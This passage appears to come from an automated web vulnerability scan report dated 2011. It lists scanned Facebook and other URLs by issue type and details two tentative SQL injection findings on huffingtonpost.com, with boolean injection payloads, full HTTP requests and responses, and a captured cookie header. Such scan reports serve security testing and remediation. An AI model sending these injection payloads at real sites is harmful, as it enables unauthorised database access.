20.389. http://www.facebook.com/plugins/like.php

20.390. http://www.facebook.com/plugins/like.php

20.391. http://www.facebook.com/plugins/like.php

20.392. http://www.facebook.com/plugins/like.php

20.393. http://www.facebook.com/plugins/like.php

20.394. http://www.facebook.com/plugins/like.php

20.395. http://www.facebook.com/plugins/like.php

20.396. http://www.facebook.com/plugins/like.php

20.397. http://www.facebook.com/plugins/like.php

20.398. http://www.facebook.com/plugins/like.php

20.399. http://www.facebook.com/plugins/like.php

20.400. http://www.facebook.com/plugins/like.php

20.401. http://www.facebook.com/plugins/like.php

20.402. http://www.facebook.com/plugins/like.php

20.403. http://www.facebook.com/plugins/like.php

20.404. http://www.facebook.com/plugins/like.php

20.405. http://www.facebook.com/plugins/like.php

20.406. http://www.facebook.com/plugins/like.php

20.407. http://www.facebook.com/plugins/like.php

20.408. http://www.facebook.com/plugins/like.php

20.409. http://www.facebook.com/plugins/like.php

20.410. http://www.facebook.com/plugins/like.php

20.411. http://www.facebook.com/plugins/like.php

20.412. http://www.facebook.com/plugins/like.php

20.413. http://www.facebook.com/plugins/like.php

20.414. http://www.facebook.com/plugins/like.php

20.415. http://www.facebook.com/plugins/like.php

20.416. http://www.facebook.com/plugins/like.php

20.417. http://www.facebook.com/plugins/like.php

20.418. http://www.facebook.com/plugins/like.php

20.419. http://www.facebook.com/plugins/like.php

20.420. http://www.facebook.com/plugins/like.php

20.421. http://www.facebook.com/plugins/like.php

20.422. http://www.facebook.com/plugins/like.php

20.423. http://www.facebook.com/plugins/like.php

20.424. http://www.facebook.com/plugins/like.php

20.425. http://www.facebook.com/plugins/likebox.php

20.426. http://www.facebook.com/plugins/likebox.php

20.427. http://www.facebook.com/plugins/likebox.php

20.428. http://www.facebook.com/plugins/likebox.php

20.429. http://www.facebook.com/plugins/likebox.php

20.430. http://www.facebook.com/plugins/likebox.php

20.431. http://www.facebook.com/plugins/likebox.php

20.432. http://www.facebook.com/plugins/likebox.php

20.433. http://www.facebook.com/plugins/likebox.php

20.434. http://www.facebook.com/plugins/likebox.php

20.435. http://www.facebook.com/plugins/likebox.php

20.436. http://www.facebook.com/plugins/likebox.php

20.437. http://www.facebook.com/plugins/likebox.php

20.438. http://www.facebook.com/plugins/likebox.php

20.439. http://www.facebook.com/plugins/likebox.php

20.440. http://www.facebook.com/plugins/likebox.php

20.441. http://www.facebook.com/plugins/likebox.php

20.442. http://www.facebook.com/plugins/likebox.php

20.443. http://www.facebook.com/plugins/likebox.php

20.444. http://www.facebook.com/plugins/likebox.php

20.445. http://www.facebook.com/plugins/likebox.php

20.446. http://www.facebook.com/plugins/likebox.php

20.447. http://www.facebook.com/plugins/likebox.php

20.448. http://www.facebook.com/plugins/likebox.php

20.449. http://www.facebook.com/plugins/likebox.php

20.450. http://www.facebook.com/plugins/likebox.php

20.451. http://www.facebook.com/plugins/likebox.php

20.452. http://www.facebook.com/plugins/likebox.php

20.453. http://www.facebook.com/plugins/likebox.php

20.454. http://www.facebook.com/plugins/likebox.php

20.455. http://www.facebook.com/plugins/likebox.php

20.456. http://www.facebook.com/plugins/likebox.php

20.457. http://www.facebook.com/plugins/likebox.php

20.458. http://www.facebook.com/plugins/likebox.php

20.459. http://www.facebook.com/plugins/likebox.php

20.460. http://www.facebook.com/plugins/likebox.php

20.461. http://www.facebook.com/plugins/likebox.php

20.462. http://www.facebook.com/plugins/likebox.php

20.463. http://www.facebook.com/plugins/likebox.php

20.464. http://www.facebook.com/plugins/likebox.php

20.465. http://www.facebook.com/plugins/likebox.php

20.466. http://www.facebook.com/plugins/likebox.php

20.467. http://www.facebook.com/plugins/likebox.php

20.468. http://www.facebook.com/plugins/likebox.php

20.469. http://www.facebook.com/plugins/likebox.php

20.470. http://www.facebook.com/plugins/likebox.php

20.471. http://www.facebook.com/plugins/likebox.php

20.472. http://www.facebook.com/plugins/likebox.php

20.473. http://www.facebook.com/plugins/likebox.php

20.474. http://www.facebook.com/plugins/likebox.php

20.475. http://www.facebook.com/plugins/likebox.php

20.476. http://www.facebook.com/plugins/likebox.php

20.477. http://www.facebook.com/plugins/likebox.php

20.478. http://www.facebook.com/plugins/likebox.php

20.479. http://www.facebook.com/plugins/likebox.php

20.480. http://www.facebook.com/plugins/likebox.php

20.481. http://www.facebook.com/plugins/likebox.php

20.482. http://www.facebook.com/plugins/likebox.php

20.483. http://www.facebook.com/plugins/likebox.php

20.484. http://www.facebook.com/plugins/likebox.php

20.485. http://www.facebook.com/plugins/likebox.php

20.486. http://www.facebook.com/plugins/likebox.php

20.487. http://www.facebook.com/plugins/likebox.php

20.488. http://www.facebook.com/plugins/likebox.php

20.489. http://www.facebook.com/plugins/likebox.php

20.490. http://www.facebook.com/plugins/likebox.php

20.491. http://www.facebook.com/plugins/likebox.php

20.492. http://www.facebook.com/plugins/likebox.php

20.493. http://www.facebook.com/plugins/likebox.php

20.494. http://www.facebook.com/plugins/likebox.php

20.495. http://www.facebook.com/plugins/likebox.php

20.496. http://www.facebook.com/plugins/likebox.php

20.497. http://www.facebook.com/plugins/likebox.php

20.498. http://www.facebook.com/plugins/likebox.php

20.499. http://www.facebook.com/plugins/likebox.php

20.500. http://www.facebook.com/plugins/likebox.php

20.501. http://www.facebook.com/plugins/likebox.php

20.502. http://www.facebook.com/plugins/likebox.php

20.503. http://www.facebook.com/plugins/likebox.php

20.504. http://www.facebook.com/plugins/likebox.php

20.505. http://www.facebook.com/plugins/likebox.php

20.506. http://www.facebook.com/plugins/likebox.php

20.507. http://www.facebook.com/plugins/recommendations.php

20.508. http://www.facebook.com/plugins/recommendations.php

20.509. http://www.facebook.com/plugins/recommendations.php

20.510. http://www.facebook.com/plugins/recommendations.php

20.511. http://www.facebook.com/plugins/recommendations.php

20.512. http://www.facebook.com/plugins/recommendations.php

20.513. http://www.facebook.com/plugins/recommendations.php

20.514. http://www.facebook.com/plugins/recommendations.php

20.515. http://www.facebook.com/plugins/send.php

20.516. http://www.facebook.com/plugins/send.php

20.517. http://www.facebook.com/plugins/send.php

20.518. http://www.facebook.com/plugins/send.php

20.519. http://www.facebook.com/plugins/send.php

20.520. http://www.facebook.com/plugins/send.php

20.521. http://www.facebook.com/plugins/send.php

20.522. http://www.facebook.com/plugins/send.php

20.523. http://www.facebook.com/plugins/send.php

20.524. http://www.facebook.com/plugins/send.php

20.525. http://www.facebook.com/plugins/send.php

20.526. http://www.facebook.com/plugins/send.php

20.527. http://www.facebook.com/plugins/send.php

20.528. http://www.facebook.com/plugins/send.php

20.529. http://www.facebook.com/plugins/send.php

20.530. http://www.facebook.com/plugins/send.php

20.531. http://www.facebook.com/plugins/send.php

20.532. http://www.facebook.com/plugins/send.php

20.533. http://www.facebook.com/plugins/send.php

20.534. http://www.facebook.com/plugins/send.php

20.535. http://www.facebook.com/plugins/send.php

20.536. http://www.facebook.com/plugins/send.php

20.537. http://www.facebook.com/plugins/send.php

20.538. http://www.facebook.com/plugins/send.php

20.539. http://www.facebook.com/plugins/send.php

20.540. http://www.facebook.com/plugins/send.php

20.541. http://www.facebook.com/plugins/send.php

20.542. http://www.facebook.com/plugins/send.php

20.543. http://www.facebook.com/plugins/send.php

20.544. http://www.facebook.com/plugins/send.php

20.545. http://www.facebook.com/plugins/send.php

20.546. http://www.facebook.com/plugins/send.php

20.547. http://www.facebook.com/plugins/send.php

20.548. http://www.facebook.com/plugins/send.php

20.549. http://www.facebook.com/plugins/send.php

20.550. http://www.facebook.com/plugins/send.php

20.551. http://www.facebook.com/plugins/send.php

20.552. http://www.facebook.com/plugins/send.php

20.553. http://www.facebook.com/plugins/send.php

20.554. http://www.facebook.com/plugins/send.php

20.555. http://www.facebook.com/plugins/send.php

20.556. http://www.facebook.com/plugins/send.php

20.557. http://www.facebook.com/plugins/send.php

20.558. http://www.facebook.com/plugins/send.php

20.559. http://www.facebook.com/plugins/send.php

20.560. http://www.facebook.com/plugins/send.php

20.561. http://www.facebook.com/plugins/send.php

20.562. http://www.facebook.com/plugins/send.php

20.563. http://www.facebook.com/plugins/send.php

20.564. http://www.facebook.com/plugins/send.php

20.565. http://www.facebook.com/plugins/send.php

20.566. http://www.facebook.com/plugins/send.php

20.567. http://www.facebook.com/plugins/send.php

20.568. http://www.facebook.com/plugins/send.php

20.569. http://www.facebook.com/plugins/send.php

20.570. http://www.facebook.com/plugins/send.php

20.571. http://www.facebook.com/plugins/send.php

20.572. http://www.facebook.com/plugins/send.php

20.573. http://www.facebook.com/plugins/send.php

20.574. http://www.facebook.com/plugins/send.php

20.575. http://www.facebook.com/plugins/send.php

20.576. http://www.facebook.com/plugins/send.php

20.577. http://www.facebook.com/plugins/send.php

20.578. http://www.facebook.com/plugins/send.php

20.579. http://www.facebook.com/plugins/send.php

20.580. http://www.facebook.com/plugins/send.php

20.581. http://www.facebook.com/plugins/send.php

20.582. http://www.facebook.com/plugins/send.php

20.583. http://www.facebook.com/plugins/send.php

20.584. http://www.facebook.com/plugins/send.php

20.585. http://www.facebook.com/plugins/send.php

20.586. http://www.facebook.com/plugins/send.php

20.587. http://www.facebook.com/plugins/send.php

20.588. http://www.facebook.com/plugins/send.php

20.589. http://www.facebook.com/plugins/send.php

20.590. http://www.facebook.com/plugins/send.php

20.591. http://www.facebook.com/plugins/send.php

20.592. http://www.facebook.com/plugins/send.php

20.593. http://www.facebook.com/plugins/send.php

20.594. http://www.facebook.com/plugins/send.php

20.595. http://www.facebook.com/plugins/send.php

20.596. http://www.facebook.com/plugins/send.php

20.597. http://www.facebook.com/plugins/send.php

20.598. http://www.facebook.com/plugins/send.php

20.599. http://www.facebook.com/plugins/send.php

20.600. http://www.facebook.com/plugins/send.php

20.601. http://www.facebook.com/plugins/send.php

20.602. http://www.facebook.com/policy.php

20.603. http://www.facebook.com/privacy/explanation.php

20.604. http://www.facebook.com/profile.php

20.605. http://www.facebook.com/profile.php

20.606. http://www.facebook.com/profile.php

20.607. http://www.facebook.com/r.php

20.608. http://www.facebook.com/r.php

20.609. http://www.facebook.com/r.php

20.610. http://www.facebook.com/r.php

20.611. http://www.facebook.com/r.php

20.612. http://www.facebook.com/recover.php

20.613. http://www.facebook.com/recover.php

20.614. http://www.facebook.com/recover.php

20.615. http://www.facebook.com/robynalys

20.616. http://www.facebook.com/share.php

20.617. http://www.facebook.com/share.php

20.618. http://www.facebook.com/share.php

20.619. http://www.facebook.com/sharer.php

20.620. http://www.facebook.com/sharer.php

20.621. http://www.facebook.com/sharer.php

20.622. http://www.facebook.com/sharer.php

20.623. http://www.facebook.com/skdarealist

20.624. http://www.facebook.com/sportingnews

20.625. http://www.facebook.com/stefanoboscolomarchi

20.626. http://www.facebook.com/techcrunch

20.627. http://www.facebook.com/terms.php

20.628. http://www.facebook.com/terms.php

20.629. http://www.facebook.com/terms.php

20.630. http://www.facebook.com/terms.php

20.631. http://www.facebook.com/theteebers

20.632. http://www.facebook.com/wmoppert

20.633. https://www.facebook.com/

20.634. https://www.facebook.com/

20.635. https://www.facebook.com/ajax/intl/language_dialog.php

20.636. https://www.facebook.com/ajax/intl/language_dialog.php

20.637. https://www.facebook.com/ajax/intl/language_dialog.php

20.638. https://www.facebook.com/captcha/tfbimage.php

20.639. https://www.facebook.com/favicon.ico

20.640. https://www.facebook.com/favicon.ico

20.641. https://www.facebook.com/h02332

20.642. https://www.facebook.com/h02332

20.643. https://www.facebook.com/h02332

20.644. https://www.facebook.com/help/contact.php

20.645. https://www.facebook.com/login.php

20.646. https://www.facebook.com/login.php

20.647. https://www.facebook.com/login.php

20.648. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

20.649. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

20.650. https://www.facebook.com/pages/create.php

20.651. https://www.facebook.com/pages/create.php

20.652. https://www.facebook.com/pages/create.php

20.653. https://www.facebook.com/r.php

20.654. https://www.facebook.com/r.php

20.655. https://www.facebook.com/r.php

20.656. https://www.facebook.com/recover.php

20.657. https://www.facebook.com/recover.php

20.658. http://www.google.com/sdch/rU20-FBA.dct

21. Credit card numbers disclosed

21.1. http://www.facebook.com/directory/pages/

21.2. http://www.facebook.com/directory/people/

22. Robots.txt file

22.1. http://www.aolnews.com/

22.2. http://www.apple.com/itunes/affiliates/download/

22.3. http://www.bankrate.com/funnel/mortgages/

22.4. http://www.blogger.com/blog-post-reactions.g

22.5. http://www.citysbest.com/

22.6. http://www.crunchboard.com/opening/detailjob.php

22.7. http://www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

22.8. http://www.dailyfinance.com/

22.9. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

22.10. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx

22.11. http://www.facebook.com/extern/login_status.php

22.12. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

22.13. http://www.fashioncocktail.com/|http:/theorganicbeautyexpert.typepad.com|http:/thesmartstylist.com|http:/www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

22.14. http://www.fiddler2.com/fiddler2/updatecheck.asp

22.15. http://www.flickr.com/badge_code_v2.gne

22.16. http://www.ft.com/cms/s/0/18b96d66-76a2-11e0-bd5d-00144feabdc0.html

22.17. http://www.games.com/game/family-feud/

22.18. https://www.godaddy.com/

22.19. http://www.google-analytics.com/__utm.gif

22.20. http://www.google.com/aclk

22.21. http://www.googleadservices.com/pagead/conversion/1034849195/

22.22. http://www.huffingtonpost.com/

22.23. http://www.ibm.com/systems/info/x86servers/blades/networking/index.html

22.24. http://www.mapquest.com/

22.25. http://www.marketwatch.com/News/Story/Story.aspx

22.26. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

22.27. http://www.moviefone.com/

22.28. https://www.neodata.com/pub/snew/new_print.shtml

22.29. http://www.netvibes.com/subscribe.php

22.30. http://www.newsgator.com/ngs/subscriber/subext.aspx

22.31. http://www.popeater.com/

22.32. http://www.realtytrac.com/birdseyeimage/propertyimage.aspx

22.33. http://www.top-sec.com/vb/clientscript/ncode_imageresizer.js

22.34. http://www.truveo.com/search

22.35. http://www.tuaw.com/hub/app-reviews

22.36. http://xml.truveo.com/apiv3

22.37. http://yellowpages.aol.com/

23. Cacheable HTTPS response

23.1. https://www.facebook.com/ajax/intl/language_dialog.php

23.2. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

23.3. https://www.fightmagazine.com/mma-magazine/subscribe.asp

23.4. https://www.neodata.com/pub/snew/new_print.shtml

24. HTML does not specify charset

24.1. http://www.aol.com/ads/load_v7.html

24.2. http://www.dailyfinance.com/_uac/adpage.html

24.3. http://www.huffingtonpost.com/ed-schultz/president-obama-and-ameri_b_856947.html

24.4. http://www.mapquest.com/cdn/_uac/adpage.htm

24.5. http://www.mmafighting.com/_uac/adpage.html

24.6. https://www.neodata.com/pub/snew/new_print.shtml

24.7. http://www.opselect.com/ad_feedback/survey.adp

25. Content type incorrectly stated

25.1. http://www.aol.com/ajax.jsp

25.2. http://www.blogsmithmedia.com/realestate.aol.com/blog/media/alec-foege.gif

25.3. http://www.facebook.com/extern/login_status.php

25.4. http://www.fiddler2.com/fiddler2/updatecheck.asp

25.5. http://www.google.com/buzz/api/button.js

25.6. http://www.huffingtonpost.com/ads/check_flights.php

25.7. http://www.huffingtonpost.com/badge/badges_json_v2.php

25.8. http://www.huffingtonpost.com/include/mod_times.php

25.9. http://www.mapquest.com/_svc/searchio

25.10. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

26. Content type is not specified



1. SQL injection
There are 2 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.huffingtonpost.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?icid=navbar_huffpo_main5&1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=28
Date: Thu, 05 May 2011 01:16:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
HPAds.ads_client_info() + ';load_mode=inline;page_type=homepage;pos=pushdown;dcopt=ist;u=970x418|homepage|pushdown|||' + HPAds.ads_u_value() + '||||' + HPAds.ads_inf_value() + ';sz=970x418;tile=1;ord=47570434?"></scr' + 'ipt>';
                       if(HuffCookies.getCookie('is_aol_user')=="1" && ad_code.match(/mid_article/gi))
                       {                            
                           var adSonarArray = {
                               'default':[1517286,2255770],
                               'entertainment':[1517280,2259767],
                               'politics':[1517131,2259768],
                               'business':[1517131,2259768],
                               'sports':[1517295,2259769],
                               'travel':[1517304,2259770]
                               }
                               document.write('<style type=\"text/css\">#ad_mid_article {float:left;width:300px;margin:10px 10px 10px 0} .mid_article_ad_label {display:none} #mid_article_deco {border:none;margin:0;padding:0}</style>');
                               if(adSonarArray[HPConfig.current_vertical_name]){
                                   HPAds.adSonar(adSonarArray[HPConfig.current_vertical_name][0],adSonarArray[HPConfig.current_vertical_name][1],300,250)
                               }
                               else{
                                   HPAds.adSonar(adSonarArray['default'][0],adSonarArray['default'][1],300,250)
                               }
                       }
    else if(!(HuffCookies.getCookie('is_aol_user')=="1" && (ad_code.match(/left_lower/gi) || ad_code.match(/pushdown/gi) || ad_code.match(/curtain/gi) )))
{
   document.write(supress_keyvalues(ks, ad_code));
}
var debugadcode = '';
document.write(debugadcode);
}
</script></div> <script type="text/javascript">
QV.place_quickread_ads = true;
</script>
   
<div class="main_big_news_ontop" id="topnav_big_news_module">


<div id="big_news_update">
<ul class="big_news_ontop">
<li ><a href="/big-news/#homepage" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');" class="title">BIG NEWS:</a></li>
<li><a href="/news/gingrich-2012" class="big_news_item first" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');">Gingrich 2012</a></li>
<li class='line'>|</li>
<li><a href="/news/elections-2012" class="big_news_item bn_v_politics" onclick="HPTrack.trackPageview('/t/a/top
...[SNIP]...

Request 2

GET /?icid=navbar_huffpo_main5&1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=29
Date: Thu, 05 May 2011 01:16:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
HPAds.ads_client_info() + ';load_mode=inline;page_type=homepage;pos=pushdown;dcopt=ist;u=970x418|homepage|pushdown|||' + HPAds.ads_u_value() + '||||' + HPAds.ads_inf_value() + ';sz=970x418;tile=1;ord=78811701?"></scr' + 'ipt>';
                       if(HuffCookies.getCookie('is_aol_user')=="1" && ad_code.match(/mid_article/gi))
                       {                            
                           var adSonarArray = {
                               'default':[1517286,2255770],
                               'entertainment':[1517280,2259767],
                               'politics':[1517131,2259768],
                               'business':[1517131,2259768],
                               'sports':[1517295,2259769],
                               'travel':[1517304,2259770]
                               }
                               document.write('<style type=\"text/css\">#ad_mid_article {float:left;width:300px;margin:10px 10px 10px 0} .mid_article_ad_label {display:none} #mid_article_deco {border:none;margin:0;padding:0}</style>');
                               if(adSonarArray[HPConfig.current_vertical_name]){
                                   HPAds.adSonar(adSonarArray[HPConfig.current_vertical_name][0],adSonarArray[HPConfig.current_vertical_name][1],300,250)
                               }
                               else{
                                   HPAds.adSonar(adSonarArray['default'][0],adSonarArray['default'][1],300,250)
                               }
                       }
    else if(!(HuffCookies.getCookie('is_aol_user')=="1" && (ad_code.match(/left_lower/gi) || ad_code.match(/pushdown/gi) || ad_code.match(/curtain/gi) )))
{
   document.write(supress_keyvalues(ks, ad_code));
}
var debugadcode = '';
document.write(debugadcode);
}
</script></div> <script type="text/javascript">
QV.place_quickread_ads = true;
</script>
   
<div class="main_big_news_ontop" id="topnav_big_news_module">


<div id="big_news_update">
<ul class="big_news_ontop">
<li ><a href="/big-news/#homepage" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');" class="title">BIG NEWS:</a></li>
<li><a href="/news/gingrich-2012" class="big_news_item first" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');">Gingrich 2012</a></li>
<li class='line'>|</li>
<li><a href="/news/elections-2012" class="big_news_item bn_v_politics" onclick="HPTrack.trackPageview('/t/a/top
...[SNIP]...

1.2. http://www.huffingtonpost.com/threeup.php [v parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.huffingtonpost.com
Path:   /threeup.php

Issue detail

The v parameter appears to be vulnerable to SQL injection attacks. The payloads 83591090'%20or%201%3d1--%20 and 83591090'%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /threeup.php?threeup=yes&VerticalName=World&entry_id=857568&v=183591090'%20or%201%3d1--%20&h=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:30:40 GMT
Connection: close
Content-Length: 7160

       <div id="857693" class="grid third flush_top threeup_entries">
           <div id="entry_857693" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/libya-government-shelling_n_857693.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273918/thumbs/r-LIBYA-INTERNATIONAL-AID-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/libya-government-shelling_n_857693.html" class="threeup_titles block margin_0_20" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">LIBYA TARGETS AID SHIP</a></h5>
           </div>
       </div>        <div id="857719" class="grid third flush_top threeup_entries">
           <div id="entry_857719" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-photos_n_857719.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273951/thumbs/r-OSAMA-BIN-LADEN-PHOTOS-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-photos_n_857719.html" class="threeup_titles block margin_0_20" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">GRAPHIC: Photos Show 3 Dead Men At Bin Laden Compound</a></h5>
           </div>
       </div>        <div id="857555" class="grid third flush_top threeup_entries">
           <div id="entry_857555" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/afghanistan-pakistan-bin-laden_n_857555.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273798/thumbs/r-AFGHANISTAN-PAKISTAN-BIN-LADEN-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/afghan
...[SNIP]...

Request 2

GET /threeup.php?threeup=yes&VerticalName=World&entry_id=857568&v=183591090'%20or%201%3d2--%20&h=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
